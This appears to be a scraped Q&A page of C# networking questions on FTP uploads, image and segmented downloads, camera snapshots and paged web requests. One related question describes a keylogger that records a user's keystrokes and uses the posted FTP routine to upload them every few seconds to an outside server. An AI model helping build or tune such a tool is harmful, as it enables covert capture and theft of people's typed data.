I have trouble with webbrowser or may be ftp. I am uploading a picture and when I navigate the webbrowser it shows me the old photo, yet the picture im uploading gets to the ftp and gets overwrite. Here is the code:
webBrowser1.Refresh(WebBrowserRefreshOption.Completely);
webBrowser1.Navigate("www.google.com");
openFileDialog1.ShowDialog();
string filename = Path.GetFullPath(openFileDialog1.FileName);
FileInfo toUpload = new FileInfo(#"upload.jpg");
FtpWebRequest request = (FtpWebRequest)WebRequest.Create("ftp://fingercube.co.cc/public_html/objimg/" + toUpload.Name);
request.Method = WebRequestMethods.Ftp.UploadFile;
request.Credentials = new NetworkCredential("username", "pass");
Stream ftpStream = request.GetRequestStream();
FileStream file = File.OpenRead(filename);
int lenght = 2;
byte[] buffer = new byte[lenght];
int bytesRead = 0;
do
{
bytesRead = file.Read(buffer, 0, lenght);
ftpStream.Write(buffer, 0, bytesRead);
}
while (bytesRead != 0);
file.Close();
ftpStream.Close();
webBrowser1.Navigate("http://fingercube.co.cc/objimg/"+toUpload.Name);
It shows me the old photo everytime, but the photo is uploaded every time. :(
If the caching suggestion doesn't work try doing the following.
this.webBrowser1.Navigate("about:blank");
HtmlDocument doc = this.wbbFinalise.Document;
doc.Write(string.Empty);
Then navigate to your ftp location.
I had a similar issue while trying to refresh a locally generated HTTP page in the web browser and this fixed the issue.
The image is cached to IE cache. You must clear the cache before refreshing the control. Have a look here: http://www.gutgames.com/post/Clearing-the-Cache-of-a-WebBrowser-Control.aspx
Also, a related question on SO: WebBrowser control caching issue
got the solution .. the problem was with the cache easy solution to it was to make new request everytime .
Related
I am currently working on a keylogger which is saving the users input to a text document. The document is updated each time the user presses a button.
I want the FTP to constantly update the text document on the server. The issue is that each time it is uploading the text document, it stops until the upload is complete and then continues logging.
I would like to know how can I prevent this from happening.
I read somewhere there is a way to do this by using an ASYNC function or something like that but I do not know where it was.
I would greatelly appreciate any help.
Here is the FTP code I created.
private static void ftp(String name)
{
FtpWebRequest request = (FtpWebRequest)FtpWebRequest.Create(
"ftp://ftp.drivehq.com/test.txt");
request.Method = WebRequestMethods.Ftp.UploadFile;
request.Credentials = new NetworkCredential(username, pass);
request.UsePassive = true;
request.UseBinary = true;
request.KeepAlive = false;
FileStream stream = File.OpenRead(name);
byte[] data = new byte[stream.Length];
stream.Read(data, 0, data.Length);
stream.Close();
Stream reqStream = request.GetRequestStream();
reqStream.Write(data, 0, data.Length);
reqStream.Close();
}
I managed to find a way how to fix it. I simply used timers and I am uploading every 10 seconds. The issue was not with FTP interrupting execution, but FTP flooding the program with constant uploading.
As I said. The timers fixed it.
I want to implement a method to download Image from website to laptop.
public static void DownloadRemoteImageFile(string uri, string fileName)
{
HttpWebRequest request = (HttpWebRequest)WebRequest.Create(uri);
HttpWebResponse response = (HttpWebResponse)request.GetResponse();
if ((response.StatusCode == HttpStatusCode.OK ||
response.StatusCode == HttpStatusCode.Moved ||
response.StatusCode == HttpStatusCode.Redirect) &&
response.ContentType.StartsWith("image", StringComparison.OrdinalIgnoreCase))
{
//if the remote file was found, download it
using (Stream inputStream = response.GetResponseStream())
using (Stream outputStream = File.OpenWrite(fileName))
{
byte[] buffer = new byte[4096];
int bytesRead;
do
{
bytesRead = inputStream.Read(buffer, 0, buffer.Length);
outputStream.Write(buffer, 0, bytesRead);
} while (bytesRead != 0);
}
}
}
But the ContentType of request or response is not "image/jpg" or "image/png". They're always "text/html". I think that's why after I save them to local, they has incorrect content and I cannot view them.
Can anyone has a solution here?
Thanks
Try setting the content type to specific image type
Response.ContentType = "image/jpeg";
You can use this code - based on JpegBitmapDecoder class
JpegBitmapDecoder decoder = new JpegBitmapDecoder(YourImageStreamSource, BitmapCreateOptions.PreservePixelFormat, BitmapCacheOption.Default);
//here you can adjust your YourImageStreamSource with outputStream value
BitmapSource bitmapSource = decoder.Frames[0];
Image myImage = new Image();
myImage.Source = bitmapSource;
myImage.Save("YourImage.jpg", System.Drawing.Imaging.ImageFormat.Jpeg);
Link : http://msdn.microsoft.com/en-us/library/aa970689.aspx
It may be possible that the sites you wish to get the image(s) from may need a cookie(s). Sometimes when we use our browsers to go to the site, we may not notice it, but the browser actually goes to the site for perhaps a millisecond, before quickly reloading, while at the same time getting the cookie. But before loading the site again, our browser would then pass it the cookie this time, whereby the site accepts it and returns the image.
To elaborate, this means your method would be doing only half of what your browser is actually doing. Half of 2 GET request methods. The first one would be to get the cookie, and the second one to actually get the image itself.
Information from (and maybe a bit related): C# generate a cookie dynamically that site will accept?
Your code is ok, but what you are trying to do is often considered undesired behavior by web site owners. Most sites want you to see images on the site but not download them at random. You can search for oposite of your question to know what techniqes and protections your are against to.
I strongly recommend to read usage agreement or any similar document on the site you are trying to scrape beore continuing.
I am referring to this article to understand file downloads using C#.
Code uses traditional method to read Stream like
((bytesSize = strResponse.Read(downBuffer, 0, downBuffer.Length)) > 0
How can I divide a file to be downloaded into multiple segments, so that I can download separate segments in parallel and merge them?
using (WebClient wcDownload = new WebClient())
{
try
{
// Create a request to the file we are downloading
webRequest = (HttpWebRequest)WebRequest.Create(txtUrl.Text);
// Set default authentication for retrieving the file
webRequest.Credentials = CredentialCache.DefaultCredentials;
// Retrieve the response from the server
webResponse = (HttpWebResponse)webRequest.GetResponse();
// Ask the server for the file size and store it
Int64 fileSize = webResponse.ContentLength;
// Open the URL for download
strResponse = wcDownload.OpenRead(txtUrl.Text);
// Create a new file stream where we will be saving the data (local drive)
strLocal = new FileStream(txtPath.Text, FileMode.Create, FileAccess.Write, FileShare.None);
// It will store the current number of bytes we retrieved from the server
int bytesSize = 0;
// A buffer for storing and writing the data retrieved from the server
byte[] downBuffer = new byte[2048];
// Loop through the buffer until the buffer is empty
while ((bytesSize = strResponse.Read(downBuffer, 0, downBuffer.Length)) > 0)
{
// Write the data from the buffer to the local hard drive
strLocal.Write(downBuffer, 0, bytesSize);
// Invoke the method that updates the form's label and progress bar
this.Invoke(new UpdateProgessCallback(this.UpdateProgress), new object[] { strLocal.Length, fileSize });
}
}
you need several threads to accomplish that.
first you start the first download thread, creating a webclient and getting the file size. then you can start several new thread, which add a download range header.
you need a logic which takes care about the downloaded parts, and creates new download parts when one finished.
http://msdn.microsoft.com/de-de/library/system.net.httpwebrequest.addrange.aspx
I noticed that the WebClient implementation has sometimes a strange behaviour, so I still recommend implementing an own HTTP client if you really want to write a "big" download program.
ps: thanks to user svick
I have a monitoring system and I want to save a snapshot from a camera when alarm trigger.
I have tried many methods to do that…and it’s all working fine , stream snapshot from the camera then save it as a jpg in the pc…. picture (jpg format,1280*1024,140KB)..That’s fine
But my problem is in the application performance...
The app need about 20 ~30 seconds to read the steam, that’s not acceptable coz that method will be called every 2 second .I need to know what wrong with that code and how I can get it much faster than that. ?
Many thanks in advance
Code:
string sourceURL = "http://192.168.0.211/cgi-bin/cmd/encoder?SNAPSHOT";
byte[] buffer = new byte[200000];
int read, total = 0;
WebRequest req = (WebRequest)WebRequest.Create(sourceURL);
req.Credentials = new NetworkCredential("admin", "123456");
WebResponse resp = req.GetResponse();
Stream stream = resp.GetResponseStream();
while ((read = stream.Read(buffer, total, 1000)) != 0)
{
total += read;
}
Bitmap bmp = (Bitmap)Bitmap.FromStream(new MemoryStream(buffer, 0,total));
string path = JPGName.Text+".jpg";
bmp.Save(path);
I very much doubt that this code is the cause of the problem, at least for the first method call (but read further below).
Technically, you could produce the Bitmap without saving to a memory buffer first, or if you don't need to display the image as well, you can save the raw data without ever constructing a Bitmap, but that's not going to help in terms of multiple seconds improved performance. Have you checked how long it takes to download the image from that URL using a browser, wget, curl or whatever tool, because I suspect something is going on with the encoding source.
Something you should do is clean up your resources; close the stream properly. This can potentially cause the problem if you call this method regularly, because .NET will only open a few connections to the same host at any one point.
// Make sure the stream gets closed once we're done with it
using (Stream stream = resp.GetResponseStream())
{
// A larger buffer size would be benefitial, but it's not going
// to make a significant difference.
while ((read = stream.Read(buffer, total, 1000)) != 0)
{
total += read;
}
}
I cannot try the network behavior of the WebResponse stream, but you handle the stream twice (once in your loop and once with your memory stream).
I don't thing that's the whole problem but I'd give it a try:
string sourceURL = "http://192.168.0.211/cgi-bin/cmd/encoder?SNAPSHOT";
WebRequest req = (WebRequest)WebRequest.Create(sourceURL);
req.Credentials = new NetworkCredential("admin", "123456");
WebResponse resp = req.GetResponse();
Stream stream = resp.GetResponseStream();
Bitmap bmp = (Bitmap)Bitmap.FromStream(stream);
string path = JPGName.Text + ".jpg";
bmp.Save(path);
Try to read bigger pieces of data, than 1000 bytes per time. I can see no problem with, for example,
read = stream.Read(buffer, 0, buffer.Length);
Try this to download the file.
using(WebClient webClient = new WebClient())
{
webClient.DownloadFile("http://192.168.0.211/cgi-bin/cmd/encoder?SNAPSHOT", "c:\\Temp\myPic.jpg");
}
You can use a DateTime to put a unique stamp on the shot.
Here's the purpose of my console program: Make a web request > Save results from web request > Use QueryString to get next page from web request > Save those results > Use QueryString to get next page from web request, etc.
So here's some pseudocode for how I set the code up.
for (int i = 0; i < 3; i++)
{
strPageNo = Convert.ToString(i);
//creates the url I want, with incrementing pages
strURL = "http://www.website.com/results.aspx?page=" + strPageNo;
//makes the web request
wrGETURL = WebRequest.Create(strURL);
//gets the web page for me
objStream = wrGETURL.GetResponse().GetResponseStream();
//for reading web page
objReader = new StreamReader(objStream);
//--------
// -snip- code that saves it to file, etc.
//--------
objStream.Close();
objReader.Close();
//so the server doesn't get hammered
System.Threading.Thread.Sleep(1000);
}
Pretty simple, right? The problem is, even though it increments the page number to get a different web page, I'm getting the exact same results page each time the loop runs.
i IS incrementing correctly, and I can cut/paste the url strURL creates into a web browser and it works just fine.
I can manually type in &page=1, &page=2, &page=3, and it'll return the correct pages. Somehow putting the increment in there screws it up.
Does it have anything to do with sessions, or what? I make sure I close both the stream and the reader before it loops again...
Have you tried creating a new WebRequest object for each time during the loop, it could be the Create() method isn't adequately flushing out all of its old data.
Another thing to check is that the ResponseStream is adequately flushed out before the next loop iteration.
This code works fine for me:
var urls = new [] { "http://www.google.com", "http://www.yahoo.com", "http://www.live.com" };
foreach (var url in urls)
{
WebRequest request = WebRequest.Create(url);
using (Stream responseStream = request.GetResponse().GetResponseStream())
using (Stream outputStream = new FileStream("file" + DateTime.Now.Ticks.ToString(), FileMode.Create, FileAccess.Write, FileShare.None))
{
const int chunkSize = 1024;
byte[] buffer = new byte[chunkSize];
int bytesRead;
while ((bytesRead = responseStream.Read(buffer, 0, buffer.Length)) > 0)
{
byte[] actual = new byte[bytesRead];
Buffer.BlockCopy(buffer, 0, actual, 0, bytesRead);
outputStream.Write(actual, 0, actual.Length);
}
}
Thread.Sleep(1000);
}
Just a suggestion, try disposing the Stream, and the Reader. I've seen some weird cases where not disposing objects like these and using them in loops can yield some wacky results....
That URL doesn't quite make sense to me unless you are using MVC or something that can interpret the querystring correctly.
http://www.website.com/results.aspx&page=
should be:
http://www.website.com/results.aspx?page=
Some browsers will accept poorly formed URLs and render them fine. Others may not which may be the problem with your console app.
Here's my terrible, hack-ish, workaround solution:
Make another console app that calls THIS one, in which the first console app passes an argument at the end of strURL. It works, but I feel so dirty.